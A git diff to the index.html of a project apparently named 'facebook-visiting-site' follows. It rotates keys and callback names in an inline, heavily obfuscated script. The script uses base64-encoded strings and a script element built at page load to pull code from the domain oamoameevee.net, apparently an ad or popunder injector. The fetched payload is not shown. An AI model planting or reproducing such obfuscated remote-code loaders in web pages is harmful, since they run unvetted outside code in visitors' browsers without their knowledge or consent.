facebook-visiting-site

--- a/public/index.html
+++ b/public/index.html
@@ -534,15 +534,15 @@
                 ln = "Ly9vYW1vYW1lZXZlZS5uZXQvNDAwLzg5NTQ1MzQ=",
                 yn = "b2Ftb2FtZWV2ZWUubmV0",
                 Bt = 2,
-                Nt = 1739784145 * e.mr,
+                Nt = 1739789522 * e.mr,
                 Tt = "Zez$#t^*EFng",
-                Ft = "n9m",
-                At = "qbn5843u4ow",
-                pn = "som6mc4l",
-                xn = "loj",
-                sn = "8yueusjks6t",
-                Lt = "_latdql",
-                Xt = "_wdphlo",
+                Ft = "ajh",
+                At = "dli1uzw295k",
+                pn = "32qycybd",
+                xn = "w2n",
+                sn = "jcy6keqcdd6",
+                Lt = "_qxdnnvlb",
+                Xt = "_utaqmlvh",
                 Zt = false,
                 x = e.MK(),
                 Dt = e.XM[e.Pk](e.h)[e.zj]()[e.EK](e.h);
@@ -2169,7 +2169,7 @@
       } catch (e) {
         E();
       }
-    })("oamoameevee.net", 8954533, document.createElement("script"), _latdql);
+    })("oamoameevee.net", 8954533, document.createElement("script"), _qxdnnvlb);
   </script>
   <body>
     <noscript>You need to enable JavaScript to run this app.</noscript>
